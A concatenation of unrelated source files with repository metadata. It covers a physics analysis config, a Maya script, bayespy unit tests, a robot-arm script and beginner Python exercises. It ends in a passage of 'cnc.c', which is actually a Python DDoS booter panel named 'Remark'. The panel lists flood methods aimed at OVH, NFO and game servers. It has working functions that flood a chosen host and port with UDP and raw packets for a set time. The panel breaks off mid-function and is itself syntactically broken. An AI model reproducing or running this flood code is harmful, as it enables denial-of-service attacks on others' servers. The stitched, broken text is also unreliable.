from abchat.model.message import Message
from abchat.model.file import File
from abchat.model.chatroom import Chatroom
from abchat.model.chatroommessage import ChatroomMessage
from abchat.model.chatroommember import ChatroomMember
from abchat.model.chatroomban import ChatroomBan
from abchat.model.group import Group, user_group_table
from abchat.model.permission import Permission, group_permission_table
| [
"chris.gallai@gmail.com"
] | chris.gallai@gmail.com |
4ad8ad1fbd7235c212a139cdeafe67ce534debf4 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py | 6388a09a0a8e38670a88995180d3619b60830e60 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,018 | py | # structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
| [
"nicolo.trevisani@cern.ch"
] | nicolo.trevisani@cern.ch |
620ecf42cf30001f7149f9ec8fd2026093c7549c | ce63c1c0c469a22963a296eaf312838286fe59b5 | /Maya_PY/selectedPolyElementsToAENull.py | 0789546676208b0aeeb88655975f602061fa7a7d | [] | no_license | JourneyAtBuck/Code-Stubs | 95a3a0f7303c0ecdcd978bad75688cff6624a4ee | 46e2b036444bd94ff00cba5fae17e9f901744f71 | refs/heads/master | 2023-07-20T18:56:40.465748 | 2023-07-06T04:34:52 | 2023-07-06T04:34:52 | 88,553,975 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | ## makes one locator with custom prefix per selected face | vertex
import maya.cmds as cmds
import maya.mel as mel
locaPrefix = "010_text02_center"
nullPrefix = "null_" ### DON'T TOUCH ###
sel = cmds.ls(sl=True)
vertices = cmds.filterExpand(sel, sm=31) or []
faces = cmds.filterExpand(sel, sm=34) or []
edges = cmds.filterExpand(sel, sm=32) or []
selectedElements = []
if len(faces):
selectedElements = faces
elif len(vertices):
selectedElements = vertices
elif len(edges):
selectedElements = edges
counter = 1
for obj in selectedElements:
tempNull = cmds.spaceLocator(name=nullPrefix+locaPrefix+str(counter))
cmds.select(obj, r=True)
cmds.select(tempNull,add=True)
mel.eval('doCreatePointOnPolyConstraintArgList 2 { "0" ,"0" ,"0" ,"1" ,"" ,"1" ,"0" ,"0" ,"0" ,"0" };')
counter += 1
| [
"journey@buck.tv"
] | journey@buck.tv |
b7cd7a5240afedad530791addc956ba6291b5595 | 54b31b705d88e21bc0b23aabe1df15ca13a07de2 | /bayespy/inference/vmp/nodes/tests/test_concatenate.py | 26d7882980d98f8e8baf3e70236fbf7d7c701405 | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"AFL-3.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bayespy/bayespy | 307ef4c51d511e14d4693cce9929dda37124d11d | 5fe58f7160ebc3a9df7f9e96e50d2bd47837794a | refs/heads/develop | 2023-08-18T21:35:27.744022 | 2023-05-25T08:16:36 | 2023-05-25T08:16:36 | 5,568,322 | 655 | 164 | MIT | 2023-08-15T09:31:55 | 2012-08-27T08:10:20 | Python | UTF-8 | Python | false | false | 10,082 | py | ################################################################################
# Copyright (C) 2015 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for `concatenate` module.
"""
import warnings
import numpy as np
from bayespy.nodes import (Concatenate,
GaussianARD,
Gamma)
from bayespy.utils import random
from bayespy.utils.misc import TestCase
class TestConcatenate(TestCase):
"""
Unit tests for Concatenate node.
"""
def test_init(self):
"""
Test the creation of Concatenate node
"""
# One parent only
X = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (), () ))
X = GaussianARD(0, 1, plates=(3,), shape=(2,4))
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (2,4), (2,4,2,4) ))
# Two parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Two parents with shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (4,6), (4,6,4,6) ))
# Two parents with non-default axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
self.assertEqual(Y.plates, (5,4))
self.assertEqual(Y.dims, ( (), () ))
# Three parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
X3 = GaussianARD(0, 1, plates=(4,), shape=())
Y = Concatenate(X1, X2, X3)
self.assertEqual(Y.plates, (9,))
self.assertEqual(Y.dims, ( (), () ))
# Constant parent
X1 = [7.2, 3.5]
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Different moments
X1 = GaussianARD(0, 1, plates=(3,))
X2 = Gamma(1, 1, plates=(4,))
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible shapes
X1 = GaussianARD(0, 1, plates=(3,), shape=(2,))
X2 = GaussianARD(0, 1, plates=(2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible plates
X1 = GaussianARD(0, 1, plates=(4,3), shape=())
X2 = GaussianARD(0, 1, plates=(5,2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
pass
def test_message_to_child(self):
"""
Test the message to child of Concatenate node.
"""
var = lambda plates, shape: GaussianARD(
np.random.randn(*(plates + shape)),
np.random.rand(*(plates + shape)),
plates=plates,
shape=shape
)
# Two parents without shapes
X1 = var((2,), ())
X2 = var((3,), ())
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,)))[:2],
u1[0]*np.ones((2,)))
self.assertAllClose((u[1]*np.ones((5,)))[:2],
u1[1]*np.ones((2,)))
self.assertAllClose((u[0]*np.ones((5,)))[2:],
u2[0]*np.ones((3,)))
self.assertAllClose((u[1]*np.ones((5,)))[2:],
u2[1]*np.ones((3,)))
# Two parents with shapes
X1 = var((2,), (4,))
X2 = var((3,), (4,))
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
# Test with non-constant axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[:2],
u1[1]*np.ones((2,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[2:],
u2[1]*np.ones((3,4)))
# Test with constant parent
X1 = np.random.randn(2, 4)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,))
Y = Concatenate(X1, X2)
u1 = Y.parents[0].get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
pass
def test_message_to_parent(self):
"""
Test the message to parents of Concatenate node.
"""
# Two parents without shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,)))[:2],
m1[0]*np.ones((2,)))
self.assertAllClose((m[1]*np.ones((5,)))[:2],
m1[1]*np.ones((2,)))
self.assertAllClose((m[0]*np.ones((5,)))[2:],
m2[0]*np.ones((3,)))
self.assertAllClose((m[1]*np.ones((5,)))[2:],
m2[1]*np.ones((3,)))
# Two parents with shapes
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
# Two parents with non-default concatenation axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Z = Concatenate(X1, X2, axis=-2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4)))[:2],
m1[0]*np.ones((2,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[:2],
m1[1]*np.ones((2,4)))
self.assertAllClose((m[0]*np.ones((5,4)))[2:],
m2[0]*np.ones((3,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[2:],
m2[1]*np.ones((3,4)))
# Constant parent
X1 = np.random.randn(2,4,6)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = Z._message_to_parent(0)
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
pass
def test_mask_to_parent(self):
"""
Test the mask handling in Concatenate node
"""
pass
| [
"jaakko.luttinen@iki.fi"
] | jaakko.luttinen@iki.fi |
ee93303355c66a20ff5ffdd32b3ebf107b00bc0e | f5f7a1ae04a999f3f193cca647397b29806edf73 | /0000_examples/ur3_dual_interpolation_exe.py | 09b091f802f3706ab9fd2e03f1068f6f58440932 | [
"MIT"
] | permissive | kazuki0824/wrs | bf88d1568f591c61870332436bfcd079d78b87d7 | 03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0 | refs/heads/main | 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 | MIT | 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null | UTF-8 | Python | false | false | 1,191 | py | import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05) | [
"wanweiwei07@gmail.com"
] | wanweiwei07@gmail.com |
2126db684de1ccb27f69eae758e35dde6274bfa8 | 3a5a3dcd92570df195ab2721f4b60337a3b7fa73 | /dictionarybasic.py | 4086b51cddc477a25e36cfc9243b17a8a738aa81 | [] | no_license | VachaArraniry/python_portfolio | 6a10fb3cb1478d47c8f064a6f5158512105fa9f5 | 7023df213ad831f6acb976b1eb765b742768de57 | refs/heads/main | 2023-06-26T23:20:37.691633 | 2021-07-24T13:09:56 | 2021-07-24T13:09:56 | 389,101,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | indonesia = {
# key - value pair
'official_name': 'Republic of Indonesia',
'president': 'Jokowi',
'Capital': 'Jakarta',
'population': 250000000,
'states': ['Jawa Barat', 'DKI Jakarta', 'Jawa Tengah', 'Sumatera Utara'],
'ministers': [
{'Ministry of State Secretarist':'Pratikno'},
{'Ministry of Home Affairs':'Tito Karnavian'},
{'Ministry of Foreign Affairs':'Retno Marsudi'}
]
}
print(indonesia["president"])
indonesia["population"] = 250000000
for k in indonesia.keys():
print(k)
for v in indonesia.values():
print(v)
indonesia['population'] = 240000000
print(indonesia["population"])
for state in indonesia['states']:
print(state)
for minister in indonesia['ministers']:
for k in minister.keys():
print("{0} - {1}".format(k, minister[k]))
| [
"noreply@github.com"
] | VachaArraniry.noreply@github.com |
7df280abea1ccb7b3afafd877d4f3db45894d3a7 | 6fb5b49ab247238af7f463b3e2dd3026aa48a76f | /bin/pip | b244015394d3f9c49c9c249d0191228486ab1779 | [] | no_license | chinmayajyothi/Website | 4adc33be23f8674bdc574edcb11c523cb3ea4f2e | cf57a92e17218cf08e0901262a457e369183fa5c | refs/heads/master | 2020-03-31T12:19:15.665425 | 2015-01-25T19:44:37 | 2015-01-25T19:44:37 | 29,826,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | #!/home/edward/catalystcms/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==1.1','console_scripts','pip'
__requires__ = 'pip==1.1'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.exit(
load_entry_point('pip==1.1', 'console_scripts', 'pip')()
)
| [
"skatukojwala@localhost.localdomain"
] | skatukojwala@localhost.localdomain | |
1298229e6667d5b56fca496bd5b6d2adb592dec4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/kdsjor001/question2.py | b192808bc1bd49a030995b7d46e982d2aaa24594 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.') | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
3718aae08dbe2c52136b4a9d756e78fc5478a7b9 | 4677a7e89200f8566d82e7cfdb60da66c4bcf6b5 | /cnc.c | b893fe6e7692f04bc23260909d55fdd6e45b168b | [] | no_license | iShinj1/Rmark-v-something | 227bcb54ee2bff1ea927176ce153074295b72213 | 5f51745377adde57d39cba56200dff47705f440d | refs/heads/main | 2023-07-01T16:36:34.169697 | 2021-08-01T20:02:44 | 2021-08-01T20:02:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43,035 | c | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
import sys
import socket
import time
import random
import threading
import getpass
import os
import urllib
import json
nicknm = "hg"
methods = """
raw - this method page is made to overwhelm servers with raw power best methods: hexraw,tcpraw
ovh - this method page is made to bypass ovh vac with raw and bypass methods best methods:ovhnat,ovhamp
nfo - this method page is made to bypass nfo with raw and syn methods best methods:mag-7,nfonull
other - this method page is a list of methods not specifacally made for any certain server best methods:ntp-x,ak47
bypass - this method page is a list of Premium bypasses and requires you to have vip ;) best methods: You find out.
"""
user = """
╔═════════════════════════════╗
║ Welcome To Remark 25 ║
║ Please Enter your Username ║
║ In the Login Prompt Below ║
╚═════════════════════════════╝
╔═════════════════════════════════════╗
║ This Source Code is ║
║ Licensed under GPU V3.0 ║
║ FOR ALLOWED USE IN 'CYBER-WARFARE' ║
╚═════════════════════════════════════╝
"""
passw = """
╔═════════════════════════════╗
║ Welcome To Remark 25 ║
║ Please Enter your Password ║
║ In the Login Prompt Below ║
╚═════════════════════════════╝
╔═════════════════════════════════════╗
║ This Source Code is ║
║ Licensed under GPU V3.0 ║
║ FOR ALLOWED USE IN 'CYBER-WARFARE' ║
╚═════════════════════════════════════╝
"""
raw = """
udpraw [IP] [TIME] [PORT] - Raw UDP Flood
tcpraw [IP] [TIME] [PORT] - Raw TCP Flood
stdraw [IP] [TIME] [PORT] - Raw STD Flood
hexraw [IP] [TIME] [PORT] - Raw HEX Flood
vseraw [IP] [TIME] [PORT] - Raw VSE Flood
synraw [IP] [TIME] [PORT] - Raw SYN Flood
"""
ovh = """
ovhslav [IP] [TIME] [PORT] - Slavic Flood
ovhkill [IP] [TIME] [PORT] - OVH Killer
udprape [IP] [TIME] [PORT] - Raping UDP
ovhamp [IP] [TIME] [PORT] - OVH Amp Flood
ovhnat [IP] [TIME] [PORT] - OVH nat Flood
ovhdown [IP] [TIME] [PORT] - OVH Rape flood
"""
nfo = """
nfonull [IP] [TIME] [PORT] - Slavic Flood
cpukill [IP] [TIME] [PORT] - Cpu Rape Flood
nfodown [IP] [TIME] [PORT] - Nfo downer
nfodrop [IP] [TIME] [PORT] - Nfo Dropper
nforape [IP] [TIME] [PORT] - Nfo Rape
nfokill [IP] [TIME] [PORT] - Nfo Killer
ssdp [IP] [TIME] [PORT] - Amped SSDP
icmprape [IP] [TIME] [PORT] - ICMP Method
mag-7 [IP] [TIME] [PORT] - Custom method
"""
other = """
slav [IP] [TIME] [PORT] - Slavic Flood
cpukill [IP] [TIME] [PORT] - Cpu Rape Flood
fivemkill [IP] [TIME] [PORT] - Fivem Kill
icmprape [IP] [TIME] [PORT] - ICMP Rape
tcprape [IP] [TIME] [PORT] - Raping TCP
nforape [IP] [TIME] [PORT] - Nfo Method
killv1 [IP] [TIME] [PORT] - Custom Method!
killv2 [IP] [TIME] [PORT] - Custom Method!
killv3 [IP] [TIME] [PORT] - Custom Method!
ntp-x [IP] [TIME] [PORT] - Amped NTP
ak47 [IP] [TIME] [PORT] - Private attack
2kdown [IP] [TIME] [PORT] - NBA 2K Flood
"""
bypass="""
psnrape . icmp-echo tcp-amp . purple-syn
sql-lift . marklift hotspot . backend-chew
hydrakiller . cpu-smash orange-syn . dhcp
udprape . udprapev3 x-v-x . rainbow-syn
udprapev2 . udpbypass greeth . Tempest
madara . vip-clap killall . mark-III
killallv2 . killallv3 powerslap . rapecom
Example How To Attack: [96mMETHOD [IP] [TIME] [PORT]
"""
layer4 = """
udp [IP] [TIME] [PORT]
tcp [IP] [TIME] [PORT]
std [IP] [TIME] [PORT]
syn [IP] [TIME] [PORT]
vse [IP] [TIME] [PORT]
ack [IP] [TIME] [PORT]
dns [IP] [TIME] [PORT]
ovh [IP] [TIME] [PORT]
"""
"""
cookie = open(".sinfull_cookie","w+")
fsubs = 0
tpings = 0
pscans = 0
liips = 0
tattacks = 0
uaid = 0
said = 0
running = 0
iaid = 0
haid = 0
aid = 0
attack = True
ldap = True
http = True
atks = 0
def randsender(host, timer, port, punch):
global iaid
global aid
global tattacks
global running
timeout = time.time() + float(timer)
sock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP)
iaid += 1
aid += 1
tattacks += 1
running += 1
while time.time() < timeout and ldap and attack:
sock.sendto(punch, (host, int(port)))
running -= 1
iaid -= 1
aid -= 1
def stdsender(host, port, timer, payload):
global atks
global running
timeout = time.time() + float(timer)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
atks += 1
running += 1
while time.time() < timeout and attack:
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
atks -= 1
running -= 1
def main():
global fsubs
global tpings
global pscans
global liips
global tattacks
global uaid
global running
global atk
global ldap
global said
global iaid
global haid
global aid
global attack
global dp
while True:
bots = (random.randint(3250,4150))
sys.stdout.write("\x1b]2;Remark. | Devices: [{}] | Spoofed Servers [19] | Server Units [8] | Clients: [18]\x07".format (bots))
sin = input(root@Remark:~# ").lower()
sinput = sin.split(" ")[0]
if sinput == "clear":
os.system ("clear")
print (banner)
main()
if sinput == "other":
os.system ("clear")
print (other)
main()
elif sinput == "raw":
os.system ("clear")
print (raw)
main()
elif sinput == "layer4":
os.system ("clear")
print (layer4)
main()
elif sinput == "method":
os.system ("clear")
print (methods)
main()
elif sinput == "methods":
os.system ("clear")
print (methods)
main()
elif sinput == "bypass":
os.system ("clear")
print (bypass)
main()
elif sinput == "ovh":
os.system ("clear")
print (ovh)
main()
elif sinput == "nfo":
os.system ("clear")
print (nfo)
main()
elif sinput == "":
main()
elif sinput == "exit":
os.system ("clear")
exit()
elif sinput == "std":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x73\x74\x64\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./dns":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovh":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x02\x00\x2f"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./vse":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfonull":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpukill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfodown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfodrop":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nforape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfokill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ssdp":
try:
if running >= 1:
